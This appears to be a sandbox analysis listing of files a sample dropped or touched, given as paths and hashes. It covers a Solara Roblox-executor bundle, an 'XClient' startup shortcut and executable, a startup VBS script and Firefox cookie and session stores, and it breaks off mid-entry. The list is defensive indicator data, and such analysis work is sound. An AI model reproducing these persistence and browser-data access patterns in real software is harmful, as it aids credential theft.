d37ef5a848e371f7db9616a4bf8b5347449abb3e244a5527396756791583cad455802450ceeb88dce39642c47aceaf2be6b95bede23b9ed68b5d4b7b9022b9c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.nls.js

Filesize
31KB

MD5
74dd2381ddbb5af80ce28aefed3068fc

SHA1
0996dc91842ab20387e08a46f3807a3f77958902

SHA256
fdd9d64ce5284373d1541528d15e2aa8aa3a4adc11b51b3d71d3a3953f8bcc48

SHA512
8841e0823905cf3168f388a7aeaf5edd32d44902035ba2078202193354caf8cd74cb4cab920e455404575739f35e19ea5f3d88eab012c4ebefc0ccb1ed19a46e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\loader.js

Filesize
27KB

MD5
8a3086f6c6298f986bda09080dd003b1

SHA1
8c7d41c586bfa015fb5cc50a2fdc547711b57c3c

SHA256
0512d9ed3e5bb3daef94aa5c16a6c3e2ee26ffed9de00d1434ffe46a027b16b9

SHA512
9e586742f4e19938132e41145deec584a7b8c7e111b3c6e9254f8d11db632ebe4d66898458ed7bcfc0614d06e20eb33d5a6a8eb8b32d91110557255cf1dbf017

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dll

Filesize
695KB

MD5
195ffb7167db3219b217c4fd439eedd6

SHA1
1e76e6099570ede620b76ed47cf8d03a936d49f8

SHA256
e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

SHA512
56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\WebView2Loader.dll

Filesize
133KB

MD5
a0bd0d1a66e7c7f1d97aedecdafb933f

SHA1
dd109ac34beb8289030e4ec0a026297b793f64a3

SHA256
79d7e45f8631e8d2541d01bfb5a49a3a090be72b3d465389a2d684680fee2e36

SHA512
2a50ae5c7234a44b29f82ebc2e3cfed37bf69294eb00b2dc8905c61259975b2f3a059c67aeab862f002752454d195f7191d9b82b056f6ef22d6e1b0bb3673d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dll

Filesize
5.2MB

MD5
aead90ab96e2853f59be27c4ec1e4853

SHA1
43cdedde26488d3209e17efff9a51e1f944eb35f

SHA256
46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed

SHA512
f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\bin\path.txt

Filesize
42B

MD5
5354e035488ec7a05f0b55b17f7c2312

SHA1
cb54e391bf0bfab126e4c336f75ce13d894314e2

SHA256
ff99b27c03e0bcfc2f0f9c3b670869791940e616786924db009431851ec68bc3

SHA512
b990580487b332448f244b553d60c1906ed0385abda6118bfba1e95e642fdf69251dcccc6938501c92d177f755f04afb071b6bfa2246cd80107d3688505564b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.dll

Filesize
3.9MB

MD5
a4e469b250ddd6b7bf49530074eb58d6

SHA1
b453b13beef7d25bc0675fe68177e5bd2a3b3a22

SHA256
d0123ecdd83962566e620da8f4dbb3a254ed614370d67a07f6c26c3ebbd12c06

SHA512
af21f10ed6ce8b1e98be439f05786dee2dbbe4d5930853ec383f607a9c03b94609d35234bc793422768c1eda342376ca8bb87d6f3a02f30af9fcf37a0cff1bea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Filesize
90KB

MD5
d84e7f79f4f0d7074802d2d6e6f3579e

SHA1
494937256229ef022ff05855c3d410ac3e7df721

SHA256
dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227

SHA512
ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat

Filesize
280B

MD5
4914c1ebe73b458b98556cce93929e83

SHA1
600f67c02f92f83cbb8784a1d582288f5eeaa3dc

SHA256
e55d0bbf242a7f77d2224d4206f9525fbc65d6a3ee5a667105bb75ab79c5868c

SHA512
ed0dfc97c8e294d55ee7bcee17e271cafefee778b9194bf9124320810c82c0e05076e1799696cfbe45e62696c17f08ee8beff4865e35702cec0058d3776856c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat

Filesize
280B

MD5
7acaed94ade61d3c0e5fca2781c7f76c

SHA1
d6a800084272907afb49be0da44ad68c5b12c7d5

SHA256
7d257003ac44c672d3d118cd5702e4a0ae971dc47453ec4fe58a6f3774d910fa

SHA512
85ca98e2a777868f8a7b3151b5e36fa79f32b3f9bfa76b99a765dadf372be59671b79b63aa1c52e966d9802045d8387aa7dd9856a96b9fe5bfd837c76d57de03

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension Rules\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Preferences

Filesize
5KB

MD5
0b7b23724541df69f5af3bb98c64e2aa

SHA1
9cd9584355badfc9870a379ec58eefec77b91cca

SHA256
2c9acfd2feff9ba14b74ceb006dfc9c447e12f6ad91b014c6052c06485d30db2

SHA512
c93c476a9a96a36d1eaf067252d5c769f05fbd9e949bddfae58a9e196afe0236209ce4b8552bf86a78769498983e12623e546d10fe25c185a35b803acc507193

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Preferences~RFe5b1c6e.TMP

Filesize
5KB

MD5
d8084196715e3df968ccaee882cd547a

SHA1
1960e575d363adfed647b4ac434b00c99d45cb7b

SHA256
51051a256bace58b3309dad046945c246db097d05f17423deb9092f02b9d16c9

SHA512
7631e4dc85faa46977f2bf7545450d4b5c0ec8d943d2855437a6f61aa83df6d9c987a84a6fe3c08ea308c4f0c0bff434f04c307fb9c12479cedf32f5b2d11b13

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

Filesize
2KB

MD5
40eaf48ddaaafb53dbd771345cf82512

SHA1
70b88f3b2552ef91f0d64c9387a60ea5d3974dac

SHA256
8fea31880e63e3c6e33cbd04c434b328ca11c027af0975c71413ca30770403bf

SHA512
d8e6213e5332eeaf1e35da7d5a0390d11bff37210c34f317d3b9b278c7fecac7ecc572a56e7fce4976b830088238efd9b54ab23a8a2e8ac34c8f2792dd8c6287

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

Filesize
3KB

MD5
c3ca08efbdf890821b70d2cc4786aff0

SHA1
81b5aa707651fe880f1ff3d10a51d8ce5aefc81a

SHA256
c5b84b8af9b40b4da741e0dd92cc873549465f76d627f647f72f36e87e62a297

SHA512
2a8d032e231c32c30292cc889747eeeebf54379379027237bc9e8f71629731df97fdbcca4a4ef60b71c10a602b1a342c556a7e1579b8fe63fb4fe16d38d0e6a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

Filesize
3KB

MD5
e3f3165251d35ce544c7bc00245ebc94

SHA1
f2b03ad591fbe93f44b66bb3b9c95c9bf5ce161f

SHA256
589478787c6aaa7055c75ff7be267935e8c978b8c775aecb49544a0d8e4ea5c3

SHA512
6fe41f57646825e25ae0aae40d7391d5856f05d0a8633a6d77297b30178b17e316e095d9d3f88eb811df19c1ada867adfc00006265d47cb8e5152218aa894d00

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

Filesize
16KB

MD5
4a681482560b73baa9ac3b15e1fdabcf

SHA1
388d14805fb1d1caf97667ef31495f0b15cac005

SHA256
26ac241cebb36e7b9eb346ec282e41fc6aa6cac356e0617bd2bd9a22de0a9d75

SHA512
fbe26df0dd3af32e7d7fcb73dfc11a6afd3c7197d3d95a669bb31cb480034317e880069348212fa771a6836bf86ae62fa71eb112a869bc75b84d321d3ba4564a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State~RFe5ac758.TMP

Filesize
1KB

MD5
ebb8e50681dc207d2204719f9b567a15

SHA1
7288c7563d5c99b2e626c013059863f196d06ff9

SHA256
91035064a699783a4b7174ba12aad2533158da73071da6ed07e09dd5361925f9

SHA512
c6f7d10996a9fb36499a03adeee78472e42bf4021c6bf8779a7f3afb623cecbcef012a045fe0edb537fee30cd4a71ad8225bbf90dfd28883df36fbb95102ad28

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\libcurl.dll

Filesize
522KB

MD5
e31f5136d91bad0fcbce053aac798a30

SHA1
ee785d2546aec4803bcae08cdebfd5d168c42337

SHA256
ee94e2201870536522047e6d7fe7b903a63cd2e13e20c8fffc86d0e95361e671

SHA512
a1543eb1d10d25efb44f9eaa0673c82bfac5173055d04c0f3be4792984635a7c774df57a8e289f840627754a4e595b855d299070d469e0f1e637c3f35274abe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\vcruntime140.dll

Filesize
99KB

MD5
7a2b8cfcd543f6e4ebca43162b67d610

SHA1
c1c45a326249bf0ccd2be2fbd412f1a62fb67024

SHA256
7d7ca28235fba5603a7f40514a552ac7efaa67a5d5792bb06273916aa8565c5f

SHA512
e38304fb9c5af855c1134f542adf72cde159fab64385533eafa5bb6e374f19b5a29c0cb5516fc5da5c0b5ac47c2f6420792e0ac8ddff11e749832a7b7f3eb5c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\zlib1.dll

Filesize
113KB

MD5
75365924730b0b2c1a6ee9028ef07685

SHA1
a10687c37deb2ce5422140b541a64ac15534250f

SHA256
945e7f5d09938b7769a4e68f4ef01406e5af9f40db952cba05ddb3431dd1911b

SHA512
c1e31c18903e657203ae847c9af601b1eb38efa95cb5fa7c1b75f84a2cba9023d08f1315c9bb2d59b53256dfdb3bac89930252138475491b21749471adc129a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqidukhv.fud.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Filesize
764B

MD5
7300162b07211df497d8157d0bc4f2cb

SHA1
97095f5cac3e97eeb68cc2eeeb411d18b2305034

SHA256
d666e25a5760de072f751cfe78e401594e74540cfa872522fe78611bb720598c

SHA512
96c76e9bb11e3f47432ed070f2d7c6aded2b612a13baad9dede33804d7ae8f427ba1e33b00d38cff4d4fefab2c8f5724f13a1f2cc37fdce3210c94b148e51add

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\cookies.sqlite

Filesize
512KB

MD5
407c4caa0ee19e49a0e72b90bee2629d

SHA1
f6b571187feade16810087aa8e81bf9de2c37651

SHA256
e4d408d124dc9a26b0bd405f480790007530b474b4092994ffa35c1cd503b42c

SHA512
af19fabaa9370ec8b36a85d95ba27136b7927fe5c001ebf8bcf01b3d48b584649c607f511d1f8f129d588fd218807e4a9bc735ff3e8f76f2b99365127c85a3fa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
fa999fc17537f190a4f3c4db42b23d68

SHA1
04a8c3d7962c5adfcdb8020af86555fb83a13388

SHA256
ea4090f5169e9706a80908f9dadbf7144983a20cae7b8ba347a969fcbca9e74e

SHA512
842fa1eddb890797a78890bb150c87f4e8af8e12108c9851ce37e097b69ae690b57b509eb5b9706eac76de3cbbab1c3d102ae2cafcb25b495ea6c72710beb97a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\0ec98c56-3a64-4816-bb12-4b1c3a893a77

Filesize
746B

MD5
f453ec46f36200036cd6d59b5d73aafe

SHA1
2dea7381d5b714c08960484388ad91676b868fca

SHA256
6028c754bef96f0a541897c6b71fbaaf7c4b5f5c53f6fd6334855d01815306e6

SHA512
85e78df5533a2ff1c15fad344676fd02827f915b5d06da5570e601d6e04d0f6e79273004add5aa183d957058813a3ca8443739adad4e4d28b7da4c9ebbc135b6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\3dff6eb0-6484-4bc5-a45f-9d03edc6db5d

Filesize
11KB

MD5
dfa4cb5f17cde77fa7c1e0a9898512b3

SHA1
fb74d4fb0a3d2822b84698549293f1c407cd86e9

SHA256
0e63344bd02b42a00fc75513a2a4b0533e56baacbbf8ca67e68cca808ac7138f

SHA512
09c8c036f57599100754f0dcffdd96c09398692dba7b6115aa4a43dee26c81de928cc56e708d46cea9550a174e86d65cea0bb697c1f5a165a964b2bbf1f37f71

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\places.sqlite

Filesize
5.0MB

MD5
217b4a8381d213cb6be66096e04afea9

SHA1
cabc1025b7ec661cfba37b97f8f9467a1c0298a2

SHA256
39af005f2c75ea390f58132998f931fd672b378cc9dc45d211fb453cf0731332

SHA512
824eefd6a76e233fcbe72792f2a4a6e9339181aaa6a1e0b46c6b0edddda9e408bea6254d9c81959375ee89d276e2e3f6a9eff70fb488a6ad93d0998a9cdc0c39

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

Filesize
6KB

MD5
ac5a44f310a8e1598c2ae227ea1661ac

SHA1
2ee2ca8b0adbdaa292778b46a71f00dceee19736

SHA256
fc20214d7c1f2da8dae8245b90858c705c906bb6940fe3615bf531ddec77a75e

SHA512
952919437dafe119f647c796f84b66249e416e884208b8a0663566ba2a6917f20aa89d4fed12f3cd68e3fef8a106f81bb45efe5b4efcbf3a0ee59f75b5280f6a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

Filesize
6KB

MD5
69fa8a80fc20d2133a54e83d019949b3

SHA1
3a4b0c1a3ecfd3d8c6c80e1d96046a519faee14c

SHA256
80fc5fb38b032e1f7b96ed367de156d45893790c2e079d2c95083379dbfdb0ff

SHA512
159e51c05c2d530021787a12b3a65816d8a945852a0e3a2edc5e9d2bef73517ebea4702d84bafeb189474bdc7c50eba724f6f72bdd0b1a3e1dca6a71db43afbb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js

Filesize
6KB

MD5
1b2aa63855dd0e4e68ee435194888061

SHA1
73acb63b3d1a79c013b7d0d33a11fbcb0fba1d29

SHA256
21d083a88a4e86432c9d44029fdb34aa3835334a21645f4d60da28a36dad62a9

SHA512
303c8ad731b0808673277dc66768c086c4dc1419aaa0bc784915bdfd638f9f0ce2339057d2b386f8860a5e9d84fa65a4a1d78b1bda16b1f4629567b3730cd233

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js

Filesize
6KB

MD5
2103b0a7d20609a754bca2f10a0d48f4

SHA1
89e2764259b17a4c11abee66ba06db2ef0e18228

SHA256
fe84e50e9175779bfe8ccc20d2acf44861ab9c3c095e444ebe2d2cc3626508e6

SHA512
d18af7837afc7d17b0db2c4e1191844c8d250c58abeefaa55dd63aa27f8039fd8dc185b7bd7465e1f4e376e348eff3f289343c601b8a0fa670b16dccdd088fcf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
62a0a66059d5ad2f0cf85cc18c75f60c

SHA1
117f7782c0e8aabd87a97eed04ef407959d09e5d

SHA256
56384ea8620686a48ee3494059b69dece444c21c3b06265d58f5fcb221967010

SHA512
0eb977746479a7c82d76af0b4e24d6be82280d81042cca6ba68f47d3b82e340539c45c6cb25dad4b51200176ada6bd11848c1faaa356927d48f049e0a264ffb0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
7b19499ad4df3053d4eb37b63eac149f

SHA1
550b34ae608235afe7e1a17c10de8a20956ced73

SHA256
cafe61fa7461612c72449b411c365fb4e607358d8e414b0883188d1aba09db63

SHA512
00b79378a73eb2eed9516f82a8ad2719df596f75d546d27a7cd9250a7b4c83ff2456b37961e73eff6600277ac492b66c762b0d9dc1ff66f424360d6467182f36

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
8c5d9186a2d7bff0f0c28df3ba9d2eec

SHA1
38d2ace6d0296018a761b6d1f21b4c40703c49ad

SHA256
a8ae6df8dfaa258c95bca578f70df886c6cbeb5afc08c87fab90d37037d38006

SHA512
8394421dc3c69cbbb1012a0447d1d0294ab5cbbdc33786ba312a9d41619bbabf6eca5261f9d87c4807378f4e87e661905d174ead1b5ff15b3fd340d2f6f60bb4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
44168a9ee780c4fed10fd13f50c1774f

SHA1
c77e7883d2ae21ae492ca4aa17215217978b438e

SHA256
9148f4dc37c9b8148c65abfd10c1ccba3fd3c4d54616d3fdbaab245461f17e11

SHA512
854b03386cbb6cec150f856ac2ca031cb4b7390ed80b285aead4a1cff70f0acef4e01727bfc0827dcae84ec7fa4942f19bc5ee0e0f78562f2107fe7084873b07

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
5fd6c139a4d8ab6c09b695d2a1424b4c

SHA1
793f3db530d0cb7811af7a567b69458c021f563d

SHA256
04f375482f36ac057cf7ee0e69a5a1017fd81dadb55ddcc9db1388cd33872849

SHA512
84d9f8627e1a4bd992425e070693d8beb2d88feb839ef31550d3c1b0703517bf54b72e5ac4735694d2b137f05a5992ac3bf880224fe949fc31df7b884e6540c3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
115e5498e77917819a39b00e139d09df

SHA1
f3b6c69a637bda98ed1af598eef3966d6509d545

SHA256
9b582db1eebbfb312b8543649fcc179c45bc736778ee66fd5703ea20a1d88857

SHA512
675e0336309392ade99ae6af69ade0527bc8a78f63cbb9eac27b66c19b9c58bc31f1491aab572a50590206aa2328093380866336f60cce413f1d3e9f06495a60

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
c56c7e58bdbcfb97938afc75a7b9b300

SHA1
feecae2a6b17869e4c3315c7ab5c9667cabc8e6f

SHA256
750898d92ba962fd59a0ab0cf2c8a2a44208f878bd55b42f3052ef082abc732c

SHA512
74a8b2ec79676238745fc268c1f91ebdf06065f82471a40bc42fb52c3bc64fdce5b3ed91bf4af2efee1889b275dcbbc58767795c06e74c36501f0ed673a363e6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
37d6851f0bd03c12c867836d9dbc67a7

SHA1
cc14c032e5fa9469c2dbe087c3bce1ac6efcdc87

SHA256
cdca1d1f5d928c37aa115a224d41cd685becac86826b0785f0427665c6426709

SHA512
8fbd21d40db8bc832fb09e76d12722fc13e44aaadaf1d4db45d65b4ac1d13994734bb19f4bc30d37f1cf875fca514aee5884dd288908dafce6d358207e104531

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
5c32bdb82cf36ae82c2558a1aa589081

SHA1
3153f65889afef2167f5e9a4f2211f12c490da08

SHA256
2e9fd5566305587928819abfed178ee60521bd3526cbb5e701398764e46a3e49

SHA512
118d78b2f24b9916eae27459f0f3ec522f17fa7b3babaee6c440bb0d87b1d07c7d3cdcbe90c36a0df232d0361336b2ddeb2df6b7d8ab877427d4c4f4e0a12775

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
602fb8eff263552dfb2f80d05ff5cbee

SHA1
727b5de1f0f44463b7246eac182a5b442d837cb1

SHA256
d05d854cf14a24c1fb192777b1d1a27363ece0f446ca406f6d59bfb1bb4c3a99

SHA512
7c1514e59fb92450142a8d695283db4d24d7c695dd5f8ddae0ea05a385007e6a28a6bcf5661f892d8af370eccdf15b65dabc912331b098db3cf0afeb41f7442f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\idb\3140325527hBbDa.sqlite

Filesize
48KB

MD5
bf196629d05eed1377b1279b1ff897bc

SHA1
ad2b8360ad6a656a12ce5560306aeddbe670614a

SHA256
f99b4b98f259613f070aaa162f865ee0d2119d28b3aeb8277783b62ba3238351

SHA512
caff5c7a3b057a294b9da85124c4aeddd6c0983ce7fe75968af66755093eb15f8a09d8d012af088f8abd435b9d4ab57b8e34b9573dbecb842bae6e9bfd75c10a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\ls\usage

Filesize
12B

MD5
e74b4798971593d3e235d83de242638b

SHA1
2778b19ad793ab9ce3f7a88fce5dca3b97c03999

SHA256
e6958dab05954d538c34b5cc46c6d16af86f139ec365fa62713b4f8692f19950

SHA512
a7807d1788f96e41e806ae361dfcc0b9971845702d3f493607627ca5a9eb03000056e683aab617e03bac0f4d2e7ba65a8e103136bb65976cbf49f933a55609d1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\ls\usage

Filesize
12B

MD5
d11d8178bbbb7fc2cb2dd8cdbdf4602c

SHA1
4087d523a9bfd291a9eb436f6a94c1b48c5e0624

SHA256
5ea3156b9c3f3a44ef85ccdb2eacbcf5a0ef9735dde8ffa87415475eec069c87

SHA512
54f26b7b0b19cb303d06faa94fa9a5310bc12325dc4f4db975f72b9a68d4234cc19e11f3646d3b63410d0e1ed52f7710ed04f90a2e1aa332416a589ff7bf8b8f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_469.vbs

Filesize
115B

MD5
4fdee6b7bce22ef5c841f6f4e08237db

SHA1
5ecd2878bde47b8a83af5b1d226fce0b2c28636d

SHA256
7c50b17be1e8d334e9b85b7b5a3f1384eb9d2f1acdbd8808defb48e925279ddf

SHA512
a6e408acf51f21db099e2de4c4ee185528bc45c89ecd635cf6acd1e1fccdbf0e35c0ec97af54977cd0c680f5ffc517521d76acb020f90a5aac1bb55b4799db2e

Download Submit
C:\Users\Admin\Downloads\RobloxPlayerInstaller.OMvsXMKO.exe.part

Filesize
5.3MB

MD5
b27c831bf9142b6109d3983fcd3b7795

SHA1
313194403b8f2538c804429fcd41780855a5c45c

SHA256
067a086fe23614d5ab09fd54b8b463c0c92a4230b317e852d3a51056a6eadd60

SHA512
88a0a00f0ff32f05b64f410350994bfacd67dc57cffa49bc5a94867c598973c2ee69558a5e56b12d998306dd9f73a6f18dea0359e9495c3c90037315845c018b

Download Submit
C:\Users\Admin\XClient.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
